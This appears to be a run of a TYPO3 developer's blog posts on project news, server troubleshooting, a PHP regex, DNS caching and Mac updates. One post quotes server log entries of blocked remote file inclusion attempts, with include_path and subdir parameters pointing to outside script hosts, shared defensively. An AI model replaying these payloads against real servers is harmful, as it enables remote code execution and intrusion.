It happened so that I was a sole TemplaVoila development for three years. I spent numerous hours of my own time fixing bugs and implementing new features. I never got a cent for it, it was always a pure enthusiasm. Nobody sponsored or supported this work. The reality of the open source world: you create, others use, you stay away.

Today I announced that TemplaVoila 1.4.2 will not be released any soon because of the major bugs in it. I was immediately accused of “stopping progress” by two different people. All these years of hard work meant nothing it seems. I was very much stressed by such views. I can’t bear that. And I won’t. Quality means very much to me but I am not going to listen to any more accusations. I would rather drop the project completely than being accused of stopping progress because I want to release a quality product. I am tired to fight for the quality!

I think TemplaVoila was the best that happened to TYPO3. To me my latest 1.3.x version would be still the best one: slim, small, fast, free of unnecessary clatter and cheap looking plastic icons. I am going to use 1.3 for my own projects from now on. I am going to host it on Google code and fix bugs and make it compatible with newer TYPO3 version as they are released. The official version is to be continued by other people. Since now I have absolutely no relation to TemplaVoila. My name will be removed from the extension soon.

Long live to you, TemplaVoila! Have a good future! Good bye!

Well, I do.

The solution to this common problem is: enable IPv6 in your wireless network settings (on your computer with AirPort Utility). You will be able to connect to your device. It is because fresh AirPort Extreme (or Time Capsule) use IPv6, not IPv4.

It took me three hours to figure this out. However it is 100% working solution in my case: no IPv6 — no connection to a clean AirPort Extreme or Time Capsule.

Enjoy!

As you see there is a prompt to connect (I wish it just could connect without asking!). Two buttons are selected in some way: one has full glow, another has outer glow. It means that one of the will act on space key, the other – on Enter key. Which one will act on what key? This question always makes me stop and think. Remembering excellent Steve Krug's book named "Don't make me think", I see such selection as a usability mistake by Vodafone. Obviously I wish to connect if I plugged in my modem! But how do I do that without pressing wrong button and without using mouse? I have to think for 10 or more second and guess that Enter key will probably apply the fully glowing button. May be it will, yeah. May be... What if not? I never try to remember such details because they take my brain's RAM and they are not what I should be thinking of. My experience should be different in this case: the program should provide a single selection, which is the most appropriate and desired by the user. Which one? Obviously to connect! Why else would I plug the modem?

This kind of mistakes quite common. It comes from the programmer's wish to give more choices to the user. Good wish but wrong. It makes people think to make the choice to the obvious one.

Don't make me think, Vodafone!

We had certain problems in the previous version. There were serious bugs and this release should solve the most annoying of them. I am going to take quality assurance role in TemplaVoila development and leave coding work to others. The reason for this is that I got everything I need in TemplaVoila. Other people have more ideas for extending the functionality than I do. Therefore I give them freedom to add features as they see fit. QA should be my main task for TemplaVoila from now on.

I expect to work on QA for TemplaVoila some time this week (depending on my load with other tasks). If everything goes well, we should have TemplaVoila 1.4.2 out very soon.

Normal steps in such cases would be to go and check ImageMagick installation using the TYPO3 Install tool:

There is a special section there for image tests:

Basic tests for reading graphics formats told me that convert did not produce any results.

I know what it means. I run Apache in the chrooted environment and after upgrades copies of ImageMagick in the chroot jail are not the same as outside of it. So I upgraded binaries in the jail but it did not change anything. Hmmmm.

I went to chroot jail and tried to call convert from there. Here is what I got:

convert: UnableToOpenConfigureFile `delegates.xml' @ configure.c/GetConfigureOptions/553.

delegates.xml is a file that contains ImageMagick configuration for image conversions with external programs. So it must be missing. I checked /usr/share/ImageMagic-x.y.z and that directory was empty.

"This is easy" I thought. I reinstalled ImageMagick and ran convert again. Huh? Same error? Checking the directory: it is still empty.

Finally I managed to solve it. I had to delete ImageMagick completely with all its dependencies and install it fresh. Than it worked. Now I have my thumbnails again!

There are also several bug fixes. One major of them is Google news sitemap format change. Previous version of dd_googlesitemap used obsolete format, which was not accepted by Google anymore. Also sitemap now works with shortcuts: the feature many people wanted so much.

Enjoy!

P.S. Did you know that you can send me a donation too? ;)

• Mount your install DVD. In my case it looks like:
  mkdir /mnt.dist
  mount -o loop /mnt/distro/opensuse-11.2-x86_64.iso /mnt/dist
  
• Change path to RPM packages location. In my case:
  cd /mnt/dist/suse/x86_64
• Restore original packages. In my case:
  rpm -Uvh --force yast2-ncurses-pkg-2.18.4-2.9.x86_64.rpm
  rpm -Uvh --force yast2-ncurses-2.18.10-2.1.x86_64.rpm
  

That's all. Now you can use online update. It will propose you yast2-ncurses fix, which you should install. 

Yesterday I read a phrase that made me think a lot about the way how we develop software. The source was not in English and it is hard to make a precise translation. The phrase sounds like this: “Software will be always vulnerable while it is written by humans”.

Why did this phrase caught me? For several reasons.

Firsts, I immediately remembered many extensions that I saw in the past with trivial security problems. It is so easy to avoid them and yet people still write it insecurely.

Secondly, I remembered an episode from the TV series called “Terminator: Sarah Connor Chronicles”. There is a scene where the artificial intelligence named John Henry talks to former FBI agent Ellison about a recent hack attempt:

John Henry was able to resist the attack using its own intellect. I guess it would be able to learn and prevent such attack in future forever.

John Henry talks to agent Ellison.

Unlike John Henry, most of us, humans, learn nothing.

The attack used on the Internet Explorer, is one of the classic ones for this software. Internet Explorer tries to access a method of the object, which is already freed. This is not the first (and surely not the last) time when Internet Explorer does that. Microsoft even built “Data Execution Prevention” feature in Windows trying to guard the system from its own software.

All these facts and thoughts made me think: why we, humans, are so irresponsible? Why can't we write the software like John Henry would: securely, applying our knowledge to every line of code we write? Or, may be, we can?

Computer logic vs human brain

Computers has several unique feature that makes them better than humans in certain areas.

Computers do not forget. Computers always apply techniques they are told to apply.

Humans are different. They are creative from one side, lazy from another (yes, everybody is lazy!) and chaotic from the third side. Humans are not like computers, they like to create and see results faster, even if it their creation is not built well enough (“it works, what else do you need?”).

Can we combine all good features that computers have with all good features that humans have?

I think we can.

Human brain as a CPU

In another episode John Henry said: “The human brain is an amazing computer. It's raw clock speed is 20 billion calculations per second. It's storage is functionally infinite”. That makes 20Ghz CPU plus unlimited memory: far more than modern computer can offer today! The only two things we miss in our wonderful CPU is patients and responsibility.

Both these qualities can be trained. People, who professionally works with computer programming for years, can be self–trained in a very fast way. The unfortunate effect of such training is that their thinking becomes less human and more computer–like (one/zero, white/black, good/bad, secure/insecure, optimal/unoptimal, right/wrong). It is harder to talk with such people but they are far more responsible in any aspect of the life and they are better professionals. Is it worth becoming less human? I cannot answer such question because it is a personal decision for everyone. It is definitely harder to communicate with the rest of the human world when you see how unoptimal they behave. It is harder to forgive yourself for unoptimal behavior or mistakes. But with each mistake you become more clever and learn how not to make the same mistake again. Life becomes easier in certain aspects.

How to become more responsible

So you want to become more responsible? Right... It is very hard at the beginning. Not everyone can. In fact, most people can't.

If you decide to do it, it is a lifelong decision. One you start practicing it, you cannot turn back because it becomes your lifestyle.

You have to stop running first. No, I do not talk about your morning runs around the park. Continue those! I mean: stop running in this life. Stop and see around. Is there anything you do in hurry all the time? Is there anything that deserves a better, more careful look? I bet there is. Think of it.

Start doing it properly, without hurrying. If you do cleaning, do it properly. Clean on the top of that wardrobe, it was not cleaned for ages and have heaps of dust on the top! If you drive the car, follow driving rules precisely. If you write programs, be paranoid and apply security checks and validate your objects everywhere. Just do it all the time regardless of how fast you want to skip it!

You will notice that it pays back. You will not forget to go to a meeting because you read an interesting article. Your mentality changes when you stop running and follow the “right way to do stuff”. It slower than doing it “the fast way” in short term perspective but it is much faster than doing it in long term perspective (you do not have to recover from mistakes made long time ago).

Let me give you a simple example.

I have a daughter. She is six and she goes to school. As many children of this age, she like to make her home work fast and go playing with toys. However fast in her case means inaccurate. Therefore, when we check here home work, she has to redo it. She again does it fast and has to redo it again and again. We tell her every time that she should do it once accurately and then she can play her toys for the rest of the day instead of redoing the same stuff for hours. Once she did it snower and accuratey. It was half an hour longer than her usual “fast” work but she did not have to redo it for hours later. She liked it. But she is too small to have patients to do it well every time.

Are we different from my six year girl? No, we aren't. We always run. We do not escape parameters that we get from users in order to finish that software faster. We do not read bank loan agreements because it may take 10 minutes but we want to get a cheeseburger ASAP. Later we discover catches in that agreement but it is too late. Was the cheeseburger worth it? No, it wasn't. It is our fault that we run for the cheeseburger!

So if you would like to make your life better, than stop running! Do it properly from the first time!

I believe we can do it. I believe we can beat computers in this.

There is no update for this plugin. Even worse: it is disappeared from the list of FireFox plugins. Fortunately I have it locally and managed to cheat FireFox to recognize this plugin as valid.

It is quite simple. Firsts, you need to shutdown FireFox. Next you need to go to the extensions/ subdirectory of your FireFox profile. On Mac it is in ~/Library/Application Support/Firefox/Profiles/ff3.default. In the extensions/ you will see xdebughelper@mail.ru and install.rdf inside it. Open this file in the text editor. You need to change two values there:

• set em:maxVersion to 3.*
• increase em:version

Start FireFox and you have XDebug icons in FireFox again!

Here it is.

sudo pecl update xdebug

Superglobal will magically appear. Do not forget to restart Apache:

sudo apachectl restart

function extractBody($htmlContent) {
    $result = '';
    $regExp = '/.*<body[^>]*>(.*)<\/body>.*/is';
    if (preg_match($regExp, $htmlContent)) {
        $result = trim(preg_replace($regExp, '\1', $htmlContent));
     }
    return $result;
}

Note that you have to use "i" and "s" modifiers, otherwise this regular expression will not work in all cases. "i" modifier helps to detected <body> tag in mixed or upper case. "s" modifier forces regular expression to work correctly with new line characters.

Check if you have NSCD installed. NSCD is a caching daemon for DNS lookups. Even if you have HostnameLookups off in the Apache configuration, Apache still does look ups from time to time for internal reasons. If you do not have NSCD, it may take lots of seconds (especially if host does not exist). With properly configured NSCD it will be much faster.

Here is my NSCD configuration regarding DNS lookups:

enable-cache hosts yes
positive-time-to-live hosts 3600
negative-time-to-live hosts 60
suggested-size hosts 512
check-files hosts yes

This configuration means that NSCD will use caching for all DNS queries that applications on this system make. Note that applications do not have to be aware of NSCD. It is all automatic!

NSCD will cache resolved names for an hour and unresolved names for a minute. You can play with these parameters but do not increase time outs too much or NSCD will become a memory hog. I also set NSCD to check /etc/hosts file first. It is always faster than querying external DNS servers over network and you may want to put some of your hosts to that file.

In overal TYPO3 is much faster now, especially the Backend.

Happy caching! :)

GET /article/advanced-guestbook-spam-blockin&hellip;//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close

or

GET /article/advanced-guestbook-spam-blockin&hellip;//admin.php?include_path=http://www.vnmhost.net/01.gif? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

or

GET /article//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

or

GET /article/advanced-guestbook-spam-blocking.html//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

I see requests like this daily in security logs of both my servers. They all are stopped by mod_security.

I wonder am I the only one who gets tons of this scum? :) If anybody else monitors his/her server security, you are welcome to share your "statistics" about these automated attacks to non–existing web applications.

Hacking attempt

Here is a hacking attempt coming from a Russian AGAVA Internet provider: 

--8920bc48-A--
[13/Oct/2009:21:03:12 +0300] 3Auc3X8AAAIAACKqdxMAAACG 89.108.122.160 58387 213.21.217.206 80
--8920bc48-B--
GET /%20%20/?subdir=http://ihent.ru/id1.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxx
User-Agent: Mozilla/5.0

Have a look to the referred script. This is one just outputs something but often there are very sophisticated scripts. I saw one which tried to fill hard disk with various random garbage until space was exhausted. This would make ssh logins and quick recovery impossible.

There were many requests like this one, all caught.

Persisting spider

Some Korean people seem not to understand that they are not welcome. robots.txt says they are not allowed to index the site. They still do it: 

--cde7352d-A--
[13/Oct/2009:21:01:16 +0300] 1SbJMn8AAAIAACJ4T0kAAABF 61.247.222.82 50325 213.21.217.206 80
--cde7352d-B--
GET /xxx HTTP/1.1
Host: xxx
Accept-Language: ja,en;q=0.5
User-Agent: Yeti/1.0 (NHN Corp.; help.naver.com/robots/)
Connection: close
Accept: */*

I banned one /20 subnet, now they came from a broader one. Well, I'll continue banning them. What else can I do if I do not want them here?

Looks like somebody stupid took this sample and tried to build some kind of bot with it. This bot tried to grab the site in a very aggressive way, requesting the same page many times. What did it earn in the end? A permanent ban for IP address and this user agent on all my servers.

• Fixed bug #11393: 2 folder with "exclude from speaking URL" - 404Error
• Fixed bug #9545: "exclude from speaking url segment" doesn't work if there are two or more pages with the flag in the same directory
• Fixed bug #12137: Field field_alias in table tx_realurl_uniqalias too small when using CONCAT_WS('-',verylongfieldname,other...) in alias_field
• Fixed bug #11042: Wrong behaviuor of exclude from speaking url parameter
• Fixed bug #9877: Problems with PD-Admin
• Fixed bug #10329: Speaking URL path segment disappered from page overlay
• Changed index bk_realurl02 (shorter key)
• Commented TCEmain hook: it needs a better way of handling page renames
• Fixed bug #9976: realurl stops working when encodeSpURL_postProc hook is used
• Fixed bug #11873: Error in dokumentation decodeSpURL_postProc does not exist
• Fixed bug #11347: Strip Tags in Titles
• Fixed bug #11777: Add new field "spurl_string" to tx_realurl_chashcache that makes it easier to debug the contents of this table
• Fixed bug #9267: "bad" line in realurl manual
• Removed ereg_* functions (deprecated in PHP 5.3)
• Small fixes in the redirect module
• Replace cHash with the one provided in the query string (Snowflake fix)
• Reworked redirects module
• Fixed problem: if default language uid is not 0 and language is not set in the URL, RealURL still used 0
• Changed layout and fields in the 'Redirects' function
• Removed 'Clear cache' on extension update
• Changed cHash table to use a full md5 string as URL hash. This makes less possible to create wrong cHashes.
• Use full URL in redirects to prevent wrong redirects
• Removed a method to find root page id by is_siteroot check
• Fixed double call to findRootPageId() when using _DOMAINS
• Added pages_language_overlay to modified_tables to make EM happy
• Removed hash from tx_realurl_pathcache and optimized the whole handling of this cache with additional indexes
• Added strict mode with more checks for the configuration
• Added a call to pageNotFound and exit if incoming URL cannot be parsed

• Exposé in Dock
• Minimize to the same icon instead of adding extra icon to the Dock
• Loads and in general works faster
• Remembers language settings for each application. Now I can type in Russian in Skype, in Latvia in the web browser and in English in NetBeans without using language switch

What I did not like:

• Safari plugins lost
• huge icons in stacks with no way to make them smaller
• PHP 5.3 and no way to downgrade to 5.2.x

It took 1 hour 15 minutes to update my MacBook Pro. In general it was a good update.

Now Snow Leopard is out. PGP Inc promised to release a Snow Leopard–compatible version of WDE together with the Snow Leopard release. They failed. Instead they offered a beta program where anybody can sign up. I signed up twice. No good. Not even a single response from PGP.

PGP keeps complete silence about updating WDE for Snow Leopard. I waited for weeks but now I decided to get rid of WDE. It is a bad attitude to customers, when PGP continues to keep silence while users actively ask about the status of the software.

I decided to get rid of WDE and install Snow Leopard. If PGP Inc fails to keep its promises and ignores its customers, than I am no longer a customer of PGP Inc. That ends PGP product usage for me.